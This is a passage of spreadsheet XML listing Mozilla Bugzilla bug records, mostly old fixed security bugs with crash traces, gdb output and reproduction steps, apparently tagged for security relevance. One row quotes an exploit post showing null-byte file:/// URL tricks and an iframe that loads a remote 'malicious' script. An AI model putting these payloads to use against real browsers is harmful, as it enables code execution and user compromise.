    #33 0x55e150df0b2c in main /home/sourc7/git/gecko-dev-asan/browser/app/nsBrowserApp.cpp:327:18
    #34 0x7f8ab7ce8b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
    #35 0x55e150d417d8 in _start (/home/sourc7/git/gecko-dev-asan/objdir-ff-asan/dist/bin/firefox+0xa97d8)
```</t>
        </is>
      </c>
      <c r="X1017" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" t="n">
        <v>1132467</v>
      </c>
      <c r="B1018" t="inlineStr">
        <is>
          <t>2015-02-12 07:41:36 -0800</t>
        </is>
      </c>
      <c r="C1018" t="inlineStr">
        <is>
          <t>[qcms] stack buffer overread in lut_inverse_interp16</t>
        </is>
      </c>
      <c r="D1018" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:37 -0700</t>
        </is>
      </c>
      <c r="E1018" t="n">
        <v>1</v>
      </c>
      <c r="F1018" t="n">
        <v>1</v>
      </c>
      <c r="G1018" t="n">
        <v>3</v>
      </c>
      <c r="H1018" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1018" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1018" t="inlineStr">
        <is>
          <t>Graphics: Color Management</t>
        </is>
      </c>
      <c r="K1018" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1018" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1018" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1018" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1018" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1018" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q1018" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1018" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1018" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T1018" t="n">
        <v>1</v>
      </c>
      <c r="U1018" t="n">
        <v>0</v>
      </c>
      <c r="V1018" t="n">
        <v>41</v>
      </c>
      <c r="W1018" t="inlineStr">
        <is>
          <t>Created attachment 8563421
012d065588837d069fc28baa44744c5d
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Steps to reproduce:
Load ICC file 012d065588837d069fc28baa44744c5d in a transformation.
Actual results:
stack-buffer-overflow READ of size 2
lut_inverse_interp16 qcms/src/transform_util.c:378:14
The calculation of cell0 on line 373 is wrong which leads to a negative offset into LutTable. Potentially, this can be used to disclose data from the stack because the read value is later used in the precached transformation.
(gdb) p length
$2529 = 256
371             val2 = (length-1) * ((double) (x - 1) / 65535.0);
(gdb) info locals
l = -258
r = -258
x = -257
res = 65535
NumZeroes = 0
NumPoles = 255
cell0 = -156712448
cell1 = 32767
val2 = 1.2598673968951787e-321
y0 = 6.9533490648866048e-310
y1 = 6.9533557036156112e-310
x0 = 6.9533558073464722e-310
x1 = 7.2035640719190427e-317
a = 0
b = 6.9533491707515823e-310
f = 6.9533484734308871e-310
(gdb) n
373             cell0 = (int) floor(val2);
(gdb) info locals
l = -258
r = -258
x = -257
res = 65535
NumZeroes = 0
NumPoles = 255
cell0 = -156712448
cell1 = 32767
val2 = -1.0038910505836576
y0 = 6.9533490648866048e-310
y1 = 6.9533557036156112e-310
x0 = 6.9533558073464722e-310
x1 = 7.2035640719190427e-317
a = 0
b = 6.9533491707515823e-310
f = 6.9533484734308871e-310
(gdb) n
374             cell1 = (int) ceil(val2);
(gdb) info locals
l = -258
r = -258
x = -257
res = 65535
NumZeroes = 0
NumPoles = 255
cell0 = -2
cell1 = 32767
val2 = -1.0038910505836576
y0 = 6.9533490648866048e-310
y1 = 6.9533557036156112e-310
x0 = 6.9533558073464722e-310
x1 = 7.2035640719190427e-317
a = 0
b = 6.9533491707515823e-310
f = 6.9533484734308871e-310</t>
        </is>
      </c>
      <c r="X1018" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" t="n">
        <v>1384626</v>
      </c>
      <c r="B1019" t="inlineStr">
        <is>
          <t>2017-07-26 09:02:15 -0700</t>
        </is>
      </c>
      <c r="C1019" t="inlineStr">
        <is>
          <t>Tracking bug for 2017-09-26 migration work</t>
        </is>
      </c>
      <c r="D1019" t="inlineStr">
        <is>
          <t>2018-05-31 06:22:08 -0700</t>
        </is>
      </c>
      <c r="E1019" t="n">
        <v>1</v>
      </c>
      <c r="F1019" t="n">
        <v>1</v>
      </c>
      <c r="G1019" t="n">
        <v>5</v>
      </c>
      <c r="H1019" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1019" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1019" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K1019" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1019" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1019" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1019" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1019" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1019" t="inlineStr"/>
      <c r="Q1019" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1019" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1019" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1019" t="n">
        <v>1</v>
      </c>
      <c r="U1019" t="n">
        <v>0</v>
      </c>
      <c r="V1019" t="n">
        <v>22</v>
      </c>
      <c r="W1019" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1369535 +++
Prepping 56 migration bug in advance in case we need special requirements for that.</t>
        </is>
      </c>
      <c r="X1019" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" t="n">
        <v>383478</v>
      </c>
      <c r="B1020" t="inlineStr">
        <is>
          <t>2007-06-06 10:54:22 -0700</t>
        </is>
      </c>
      <c r="C1020" t="inlineStr">
        <is>
          <t>File type confusion vulnerability due to null bytes in URL (encoded as %00)</t>
        </is>
      </c>
      <c r="D1020" t="inlineStr">
        <is>
          <t>2024-01-13 10:52:44 -0800</t>
        </is>
      </c>
      <c r="E1020" t="n">
        <v>1</v>
      </c>
      <c r="F1020" t="n">
        <v>1</v>
      </c>
      <c r="G1020" t="n">
        <v>3</v>
      </c>
      <c r="H1020" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1020" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1020" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1020" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1020" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1020" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1020" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1020" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1020" t="inlineStr">
        <is>
          <t>[sg:low] file:/// not available from web</t>
        </is>
      </c>
      <c r="Q1020" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1020" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1020" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1020" t="n">
        <v>1</v>
      </c>
      <c r="U1020" t="n">
        <v>0</v>
      </c>
      <c r="V1020" t="n">
        <v>14</v>
      </c>
      <c r="W1020" t="inlineStr">
        <is>
          <t>Posted on 0x000000.com by Ronald van den Heetkamp
Firefox Remote &amp; Local Code Excution 0day.
I found this vulnerability in Firefox moments ago while I was playing with the urlbar.
It seems Firefox is vulnerable to null byte file type corruption. It is possible to execute files as a different filetype and trick Firefox into executing it. Is this dangerous? yeah it's pretty bad.
Pointers that are vulnerable:
file:///
resource:
Use:
[uri]/[filelocation]/[file][.ext]%00[.ext]
Example:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
or:
resource:///README.txt%00.html
More filetypes:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.js
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdf
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.doc
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xls
probably every filetype.
Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi :)
This could lead to various exploits, to name a few:
- Dossing a user, the above example does it almost.
- Code execution
- File access
- Trojan activation
- Virus activation
- Reflective Cross Site Scripting (RXSS)
- Cross Site Request Forgeries (CSRF)
Another example
It is possible to turn regular .txt stored files into full Javascript html zombies:
file:///[filelocation]/troy.txt%00.html
troy.txt could contain:
/*
Bunch of malicious Javascript
*/
Or:
&lt;html&gt;
&lt;iframe name="bla" src="http://www.0x000000.com/hacks/?troy.js" width="100%" height="900"&gt;&lt;/iframe&gt;
&lt;/html&gt;
Well, I guess you get the point: nasty.
Posted on 06 06 07 by 0x000000</t>
        </is>
      </c>
      <c r="X1020" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" t="n">
        <v>614893</v>
      </c>
      <c r="B1021" t="inlineStr">
        <is>
          <t>2010-11-25 21:26:01 -0800</t>
        </is>
      </c>
      <c r="C1021" t="inlineStr">
        <is>
          <t>No restrictions on image upload for avatars</t>
        </is>
      </c>
      <c r="D1021" t="inlineStr">
        <is>
          <t>2010-11-29 13:55:46 -0800</t>
        </is>
      </c>
      <c r="E1021" t="n">
        <v>1</v>
      </c>
      <c r="F1021" t="n">
        <v>1</v>
      </c>
      <c r="G1021" t="n">
        <v>5</v>
      </c>
      <c r="H1021" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1021" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J1021" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K1021" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1021" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1021" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1021" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1021" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1021" t="inlineStr"/>
      <c r="Q1021" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1021" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1021" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="T1021" t="n">
        <v>1</v>
      </c>
      <c r="U1021" t="n">
        <v>0</v>
      </c>
      <c r="V1021" t="n">
        <v>2</v>
      </c>
      <c r="W1021" t="inlineStr">
        <is>
          <t>Steps to Reproduce:
1. Go to your profile page on QMO
2. Click on "Change Avatar"
3. Upload a really large image. I used http://www.astro.uu.nl/~jleeuwen/presentations/nrao_outreach_2007//TheCrabPulsarAndNebula_VeryLarge.jpg
Actual Results:
QMO allows a user to upload really large images to crop
Expected Results:
There should be some max restriction on file size of images that QMO allows users to upload to our servers.</t>
        </is>
      </c>
      <c r="X1021" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" t="n">
        <v>400556</v>
      </c>
      <c r="B1022" t="inlineStr">
        <is>
          <t>2007-10-20 16:17:40 -0700</t>
        </is>
      </c>
      <c r="C1022" t="inlineStr">
        <is>
          <t>[FIX]Vulnerability allows script to see where user is headed, sniff history, and crash [@ nsDocShell::Destroy()] the browser too</t>
        </is>
      </c>
      <c r="D1022" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1022" t="n">
        <v>1</v>
      </c>
      <c r="F1022" t="n">
        <v>1</v>
      </c>
      <c r="G1022" t="n">
        <v>3</v>
      </c>
      <c r="H1022" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1022" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1022" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1022" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1022" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1022" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1022" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1022" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1022" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1022" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1022" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1022" t="inlineStr">
        <is>
          <t>mozilla1.9beta2</t>
        </is>
      </c>
      <c r="T1022" t="n">
        <v>1</v>
      </c>
      <c r="U1022" t="n">
        <v>1</v>
      </c>
      <c r="V1022" t="n">
        <v>36</v>
      </c>
      <c r="W1022" t="inlineStr">
        <is>
          <t>User-Agent:       Opera/9.50 (Macintosh; Intel Mac OS X; U; en)
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
See testcase.
The problem is that the resize handles on the designMode &lt;IMG&gt; are firing DOM mutation events after location.href has been updated.
I couldn't pull off any cross-site-scripting or spoofing with this, but I'm not intimately familiar with the browser's architecture...
Reproducible: Always
Steps to Reproduce:
See testcase.
Actual Results:  
The URL I was headed to was detected.
The browser can crash (if you give the testcase permission).
Expected Results:  
No detection of what URL I entered in the address bar to leave the page.
No crash.</t>
        </is>
      </c>
      <c r="X1022" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" t="n">
        <v>1871217</v>
      </c>
      <c r="B1023" t="inlineStr">
        <is>
          <t>2023-12-20 21:48:03 -0800</t>
        </is>
      </c>
      <c r="C1023" t="inlineStr">
        <is>
          <t>Android-permission prompt obscured fullscreen notification lead to spoof</t>
        </is>
      </c>
      <c r="D1023" t="inlineStr">
        <is>
          <t>2024-09-18 19:41:07 -0700</t>
        </is>
      </c>
      <c r="E1023" t="n">
        <v>1</v>
      </c>
      <c r="F1023" t="n">
        <v>1</v>
      </c>
      <c r="G1023" t="n">
        <v>2</v>
      </c>
      <c r="H1023" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1023" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J1023" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1023" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1023" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1023" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1023" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1023" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1023" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [group4] [adv-main126+]</t>
        </is>
      </c>
      <c r="Q1023" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1023" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1023" t="inlineStr">
        <is>
          <t>127 Branch</t>
        </is>
      </c>
      <c r="T1023" t="n">
        <v>1</v>
      </c>
      <c r="U1023" t="n">
        <v>0</v>
      </c>
      <c r="V1023" t="n">
        <v>32</v>
      </c>
      <c r="W1023" t="inlineStr">
        <is>
          <t>Created attachment 9369788
permissionfullscreen.html
I found a vulnerability in firefox android where a microphone permission prompt can cover fullscreen notifications which can lead to spoofs.
steps to produce
1 . open https://103.186.0.20/permissionfullscreen.html or permissionfullscreen.html
2. click the button.
OS: Android 12 (Samsung M31)</t>
        </is>
      </c>
      <c r="X1023" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" t="n">
        <v>819635</v>
      </c>
      <c r="B1024" t="inlineStr">
        <is>
          <t>2012-12-08 02:48:45 -0800</t>
        </is>
      </c>
      <c r="C1024" t="inlineStr">
        <is>
          <t>IonMonkey: "Assertion failure: [barrier verifier] Unmarked edge: &lt;unknown&gt;,"</t>
        </is>
      </c>
      <c r="D1024" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:12 -0800</t>
        </is>
      </c>
      <c r="E1024" t="n">
        <v>1</v>
      </c>
      <c r="F1024" t="n">
        <v>1</v>
      </c>
      <c r="G1024" t="n">
        <v>3</v>
      </c>
      <c r="H1024" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1024" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1024" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1024" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1024" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1024" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1024" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1024" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1024" t="inlineStr">
        <is>
          <t>[adv-main19+]</t>
        </is>
      </c>
      <c r="Q1024" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1024" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1024" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T1024" t="n">
        <v>1</v>
      </c>
      <c r="U1024" t="n">
        <v>0</v>
      </c>
      <c r="V1024" t="n">
        <v>33</v>
      </c>
      <c r="W1024" t="inlineStr">
        <is>
          <t>Created attachment 690073
stack
gcPreserveCode()
try {
    RegExp("(")
} catch (e) {}
try {
    ArrayBuffer()
    gc()
    with("") {
        t()
    }
} catch (e) {}
try {
    x = {}
    verifyprebarriers()
    r
} catch (e) {}
try {
    schedulegc(35)
    print(/(())/y)
    ArrayBuffer()
    k
} catch (e) {}
try {
    q
} catch (e) {}
try {
    RegExp("?/")
} catch (e) {}
(function() {
    for (z = 0; z &lt; 3; z++) {
        e = z
        x.h = (function() {})
    }
})()
crashes and throws the following error message on js opt shell on IonMonkey changeset 32638e411218 with --ion-eager:
Assertion failure: [barrier verifier] Unmarked edge: &lt;unknown&gt;,
s-s and assuming sec-critical because gc seems related. My js opt shell was compiled with --enable-more-deterministic and --enable-gczeal.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   113229:6ba78023b367
user:        Brian Hackett
date:        Wed Nov 14 06:46:31 2012 -0800
summary:     Eagerly generate a single copy of Ion stubs and wrappers, bug 786146. r=dvander</t>
        </is>
      </c>
      <c r="X1024" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" t="n">
        <v>652401</v>
      </c>
      <c r="B1025" t="inlineStr">
        <is>
          <t>2011-04-24 01:39:21 -0700</t>
        </is>
      </c>
      <c r="C1025" t="inlineStr">
        <is>
          <t>Push cx to stack before calling mozRequestAnimationFrame callbacks</t>
        </is>
      </c>
      <c r="D1025" t="inlineStr">
        <is>
          <t>2012-06-08 19:01:37 -0700</t>
        </is>
      </c>
      <c r="E1025" t="n">
        <v>1</v>
      </c>
      <c r="F1025" t="n">
        <v>1</v>
      </c>
      <c r="G1025" t="n">
        <v>3</v>
      </c>
      <c r="H1025" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1025" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1025" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1025" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1025" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1025" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1025" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1025" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1025" t="inlineStr">
        <is>
          <t>[sg:moderate] dangerous if web exposed or misused by addons.</t>
        </is>
      </c>
      <c r="Q1025" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1025" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1025" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T1025" t="n">
        <v>1</v>
      </c>
      <c r="U1025" t="n">
        <v>0</v>
      </c>
      <c r="V1025" t="n">
        <v>23</v>
      </c>
      <c r="W1025" t="inlineStr">
        <is>
          <t>See bug 652317</t>
        </is>
      </c>
      <c r="X1025" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" t="n">
        <v>461158</v>
      </c>
      <c r="B1026" t="inlineStr">
        <is>
          <t>2008-10-22 07:28:07 -0700</t>
        </is>
      </c>
      <c r="C1026" t="inlineStr">
        <is>
          <t>js1_6/extensions/regress-456826.js: (Math|Date) is not defined</t>
        </is>
      </c>
      <c r="D1026" t="inlineStr">
        <is>
          <t>2009-04-21 13:59:38 -0700</t>
        </is>
      </c>
      <c r="E1026" t="n">
        <v>1</v>
      </c>
      <c r="F1026" t="n">
        <v>1</v>
      </c>
      <c r="G1026" t="n">
        <v>3</v>
      </c>
      <c r="H1026" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1026" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1026" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1026" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1026" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1026" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1026" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1026" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1026" t="inlineStr">
        <is>
          <t>[sg:investigate] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q1026" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1026" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1026" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1026" t="n">
        <v>1</v>
      </c>
      <c r="U1026" t="n">
        <v>0</v>
      </c>
      <c r="V1026" t="n">
        <v>17</v>
      </c>
      <c r="W1026" t="inlineStr">
        <is>
          <t>from bug 456826 comment 36.
./js1_6/extensions/regress-456826.js:93: Math is not defined
./js1_6/extensions/regress-456826.js:127: Date is not defined
either of these errors may occur depending on the build and shell options.
this regressed in http://hg.mozilla.org/mozilla-central/rev/62b8f8cd8b69
Igor@mir2.org date: Wed Apr 02 00:46:12 2008 -0700 summary: [Bug 423874] Allocating functions together with JSObject. r=brendan</t>
        </is>
      </c>
      <c r="X1026" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" t="n">
        <v>930281</v>
      </c>
      <c r="B1027" t="inlineStr">
        <is>
          <t>2013-10-23 15:54:50 -0700</t>
        </is>
      </c>
      <c r="C1027" t="inlineStr">
        <is>
          <t>SEGV in libxul.so!nsGfxScrollFrameInner::IsLTR()</t>
        </is>
      </c>
      <c r="D1027" t="inlineStr">
        <is>
          <t>2024-05-30 08:08:25 -0700</t>
        </is>
      </c>
      <c r="E1027" t="n">
        <v>1</v>
      </c>
      <c r="F1027" t="n">
        <v>1</v>
      </c>
      <c r="G1027" t="n">
        <v>3</v>
      </c>
      <c r="H1027" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1027" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1027" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K1027" t="inlineStr">
        <is>
          <t>27 Branch</t>
        </is>
      </c>
      <c r="L1027" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1027" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1027" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1027" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1027" t="inlineStr">
        <is>
          <t>[adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q1027" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1027" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1027" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T1027" t="n">
        <v>1</v>
      </c>
      <c r="U1027" t="n">
        <v>0</v>
      </c>
      <c r="V1027" t="n">
        <v>32</v>
      </c>
      <c r="W1027" t="inlineStr">
        <is>
          <t>Created attachment 821343
av_1.html
Found by the BlackBerry Security Automated Analysis Team's fuzzing framework ALF.
==30229==ERROR: AddressSanitizer: SEGV on unknown address 0x00011fff8000 (pc 0x7f45f6cafc26 sp 0x7fff5a2f0220 bp 0x7fff5a2f02d0 T0)
AddressSanitizer can not provide additional info.
    #0 0x7f45f6cafc25 (libxul.so!nsGfxScrollFrameInner::IsLTR() const+0x2c5)
        Line 3411 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/generic/nsGfxScrollFrame.cpp"
    #1 0x7f45f6c91da3 (libxul.so!nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;)+0x643)
        Line 4129 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/generic/nsGfxScrollFrame.cpp"
    #2 0x7f45f6c93cad (libxul.so!nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;)+0xbad)
        Line 795 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/generic/nsGfxScrollFrame.cpp"
    #3 0x7f45f6c16a33 (libxul.so!nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*)+0x113)
        Line 961 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/generic/nsContainerFrame.cpp"
    #4 0x7f45f6db94a7 (libxul.so!ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;)+0x6e7)
        Line 221 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/generic/nsViewportFrame.cpp"
    #5 0x7f45f6b02cea (libxul.so!PresShell::DoReflow(nsIFrame*, bool)+0x96a)
        Line 7905 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsPresShell.cpp"
    #6 0x7f45f6b1441b (libxul.so!PresShell::ProcessReflowCommands(bool)+0x25b)
        Line 8046 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsPresShell.cpp"
    #7 0x7f45f6b13d35 (libxul.so!PresShell::FlushPendingNotifications(mozilla::ChangesToFlush)+0xa25)
        Line 3869 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsPresShell.cpp"
    #8 0x7f45f6b456e4 (libxul.so!nsRefreshDriver::Tick(long, mozilla::TimeStamp)+0x1d54)
        Line 1159 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsRefreshDriver.cpp"
    #9 0x7f45f6b4a4e0 (libxul.so!mozilla::RefreshDriverTimer::Tick()+0x1f0)
        Line 168 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsRefreshDriver.cpp"
    #10 0x7f45fa638c31 (libxul.so!nsTimerImpl::Fire()+0x6d1)
        Line 546 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsTimerImpl.cpp"
    #11 0x7f45fa6392d6 (libxul.so!nsTimerEvent::Run()+0x66)
        Line 630 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsTimerImpl.cpp"
    #12 0x7f45fa630019 (libxul.so!nsThread::ProcessNextEvent(bool, bool*)+0xaa9)
